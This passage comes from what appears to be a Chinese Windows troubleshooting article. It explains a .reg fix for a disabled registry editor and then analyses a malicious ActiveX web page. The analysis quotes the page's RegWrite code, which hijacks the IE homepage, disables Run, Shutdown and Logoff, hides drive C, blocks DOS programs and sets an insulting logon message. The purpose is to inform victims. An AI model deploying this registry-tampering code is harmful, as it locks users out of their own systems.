這是由于注冊(cè)表HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem下的DWORD值“DisableRegistryTools”被修改為“1”的緣故 , 將其鍵值恢復(fù)為“0”即可恢復(fù)注冊(cè)表的使用 。
解決辦法
用記事本程序建立以REG為后綴名的文件 , 將下面這些內(nèi)容復(fù)制在其中就可以了:
REGEDIT4[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]“DisableRegistryTools”=dword:00000000 。
10、瀏覽網(wǎng)頁(yè)開始菜單被修改
這是最“狠”的一種 , 讓瀏覽者有生不如死的感覺 。瀏覽后不僅有類似上面所說的那些癥狀 , 還會(huì)有以下更悲慘的遭遇:
進(jìn)入該網(wǎng)頁(yè)會(huì)被:
1.修改開始菜單
1)禁止“關(guān)閉系統(tǒng)”
2)禁止“運(yùn)行”
3)禁止“注銷”
2.隱藏C盤——你的C盤找不到了
3.禁止使用注冊(cè)表編輯器regedit
4.禁止使用DOS程序
5.使系統(tǒng)無法進(jìn)入“實(shí)模式”
6.禁止運(yùn)行任何程序
7.將IE瀏覽器的首頁(yè)改為http://www.findfeel.com/ , 收藏夾中也被加入該網(wǎng)址 。
那么這些功能恐怖的功能是如何實(shí)現(xiàn)的呢?原來 , 該網(wǎng)頁(yè)是有人利用Java技術(shù)制作的含有有害代碼的ActiveX網(wǎng)頁(yè)文件 。為讓更多的人了解其危害 , 我查看了其源代碼 , 將其主要部分列了出來 , 并加了詳細(xì)的注釋(文中有“注”字的部分是我加的注釋) 。
注:下面代碼是將你的IE默認(rèn)連接首頁(yè)改為http://www.findfeel.com/
Shl.RegWrite ("HKCUSoftwareMicrosoftInternet ExplorerMain
Start Page", "http://www.findfeel.com/");
注:以下是該網(wǎng)頁(yè)修改受害者的注冊(cè)表項(xiàng)所用的招數(shù)
Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersion
PoliciesExplorerNoRun", 01, "REG_BINARY");
注:使受害者系統(tǒng)沒有“運(yùn)行”項(xiàng) , 這樣用戶就不能通過注冊(cè)表編輯器來修改該有害網(wǎng)頁(yè)對(duì)系統(tǒng)注冊(cè)表的修改 。
Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersion
PoliciesExplorerNoClose", 01, "REG_BINARY");
注:使受害者系統(tǒng)沒有“關(guān)閉系統(tǒng)”項(xiàng)
Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersion
PoliciesExplorerNoLogOff", 01, "REG_BINARY");
注:使受害者系統(tǒng)沒有“注銷”項(xiàng)
Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersion
PoliciesExplorerNoDrives", "00000004", "REG_DWORD");
注:使受害者系統(tǒng)沒有邏輯驅(qū)動(dòng)器C
Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersion
PoliciesWinOldApp Disabled","REG_BINARY");
注:禁止運(yùn)行所有的DOS應(yīng)用程序;
Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersion
Policies WinOldAppNoRealMode","REG_BINARY");
注:使系統(tǒng)不能啟動(dòng)到“實(shí)模式”(傳統(tǒng)的DOS模式)下;
又注:進(jìn)入該網(wǎng)頁(yè) , 它還會(huì)修改以下的注冊(cè)表項(xiàng) , 使WINDOWS系統(tǒng)登錄時(shí)顯示一個(gè)登錄窗口(在MicroSoft網(wǎng)絡(luò)用戶登錄之前)
Shl.RegWrite ("HKLMSoftwareMicrosoftWindowsCurrentVersion
WinlogonLegalNoticeCaption", "嗚啦啦...");
注:這些代碼會(huì)使窗口的標(biāo)題是“嗚啦啦…”
Shl.RegWrite ("HKLMSoftwareMicrosoftWindowsCurrentVersion
WinlogonLegalNoticeText", "歡迎你!你這個(gè)超級(jí)無敵大白癡!《嗚啦啦...》故事開始了 , 按確定進(jìn)入悲慘世界");
注:上面一行是會(huì)在窗口中顯示出來的文字
注:下面兩行代碼修改注冊(cè)表 , 使受害者所有的IE窗口都加上以下的標(biāo)題:“嗚啦啦…”
Shl.RegWrite ("HKLMSoftwareMicrosoftInternet ExplorerMain
Window Title", "嗚啦啦...");
Shl.RegWrite ("HKCUSoftwareMicrosoftInternet ExplorerMain
Window Title", "嗚啦啦...");
注:到上面一行為止 , 完成了對(duì)受害者的注冊(cè)表的所有修改!
推薦閱讀
- 修改注冊(cè)表 找回丟失的Windows系統(tǒng)聲音
- DIY批處理文件 注冊(cè)表修改立即生效
- 快速定位注冊(cè)表收藏夾分支
- 改系統(tǒng)注冊(cè)表 實(shí)現(xiàn)Windows XP自動(dòng)登錄
- 快速還原Windows XP 注冊(cè)表技巧
- 巧改注冊(cè)表還你Windows桌面一片清凈
- 深度解析注冊(cè)表修復(fù)不成功的原因
- 教你學(xué)注冊(cè)表常用功能
- 如何打開注冊(cè)表編輯器
- 修改注冊(cè)表 Windows Vista設(shè)置系統(tǒng)信息
